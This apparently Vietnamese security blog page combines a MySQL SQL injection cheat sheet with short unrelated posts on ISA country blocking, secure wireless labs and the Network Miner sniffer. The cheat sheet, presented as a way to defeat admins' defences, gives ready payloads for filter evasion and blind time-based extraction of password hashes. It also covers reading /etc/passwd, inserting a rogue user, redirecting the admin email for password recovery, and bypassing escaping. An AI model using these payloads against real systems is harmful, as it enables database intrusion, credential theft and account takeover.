Cái này là phương thức chống lại các biện pháp bảo mật của admin nhằm chống lại SQL injection !.

Basics.

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors.

Operators

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate

all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost

Using the timeout to check if user exists

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of of the N rounds, add an extra zero and it could stall or crash your
browser!

Gathering info

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))

Note: You must specify a new file, it may not exist! and give the correct
pathname!

The CHAR() quoteless function

SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

example:

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = ‘admin’
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(‘x’)),null) FROM login

explaining: (passwordfield,startcharacter,selectlength)

is like: (password,1,2) this selects: ‘ab’
is like: (password,1,3) this selects: ‘abc’
is like: (password,1,4) this selects: ‘abcd’

A quoteless example:

SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars: 0 to 9 – ASCII 48 to 57 ~ a to z – ASCII 97 to 122

Misc

Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user

load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for “forgot login retrieval.”

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding

WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string"
に関する追加情報：

the above chars are Chinese Big5

Advanced Vectors

Using an HEX encoded query to bypass escaping.

Normal:

SELECT * FROM login WHERE user = 'root'

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal:

insert into login set user = ‘root’, pass = ‘root’

Bypass:

insert into login set user = 0×726F6F74, pass = 0×726F6F74

How to determin the HEX value for injection.

SELECT HEX('root');

gives you:

726F6F74

then add:

0x

before it.

Source.

Vào link dưới chọn Set của country muốn block tải về rồi import vào ISA.

http://www.hammerofgod.com/download/ISASets

SETTING UP SECURE WIRELESS ACCESS WITH PEAP-MS-CHAP v2 AUTHENTICATION

I. Giới Thiệu:

Nhu cầu triển khai hệ thống mạng không dây ngày càng phát triển. Mạng không dây hổ trợ cho người dùng sự tiện lợi ( có thể kết nối vào hệ thống mạng Lan, Wan ở bất cứ vị trí nào ) và đạt hiệu quả cao trong vấn đề thẩm mỹ… Tuy nhiên, vấn đề cần quan tâm ở đây là vì sự tiện lơi cho nên bất kỳ một máy tính hoặc thiết bị… chỉ cần có Wireless Card thì cũng có thể kết nối vào hệ thống mạng của bạn thông qua sóng WIFI. Để tăng mức độ an toàn, bảo mật cho hệ thống mạng không dây các nhà sản xuất đã đưa vào Access Point nhiều tính năng bảo mật như: WEP, WPA, WPA-PSk, 802.1X … hoặc Filter theo MAC Address. Với bài viết này tôi xin trình bày cho các bạn giải pháp triển khai Secure Wireless Access với sự chứng thực của PEAP-MS-CHAP v2.

II. Mô Hình:

Read the rest of this entry »

SETTING UP SECURE WIRELESS ACCESS WITH EAP-TLS AUTHENTICATION

I. Giới Thiệu:

Sau khi hoàn thành bài Lab Secure Wireless Access With PEAP-MS-CHAP v2 Authentication ở phần 1 chúng ta sẽ tiếp tục phần 2 với EAP-TLS Authentication.

II. Mô Hình:

Read the rest of this entry »

Network Miner is a portable Open Source network security analysis tool that can monitor the traffic of a connected network adapter in the Windows operating system. It utilizes a build in passive network sniffer / packet capturing tool that can detect IPs, hostnames, operating systems, ports and various other information of every connection. The network security tool requires the – separate – installation of WinPcap to function properly and reliable.

The main purpose of Network Miner is data collection for future analysis (such as forensic evidence analysis) rather than collecting data regarding the traffic on the network. Information are grouped by host rather than by packets or frames although it is possible to switch the view modes easily in the software interface.

Network Miner can – among other things – extract files and certificates transferred over the network. This can be used to save media files that are streamed across the network.

Another interesting ability is the extraction of user credentials – that is usernames and passwords for supported protocols which are then displayed in the credentials tab in Network Miner.

Source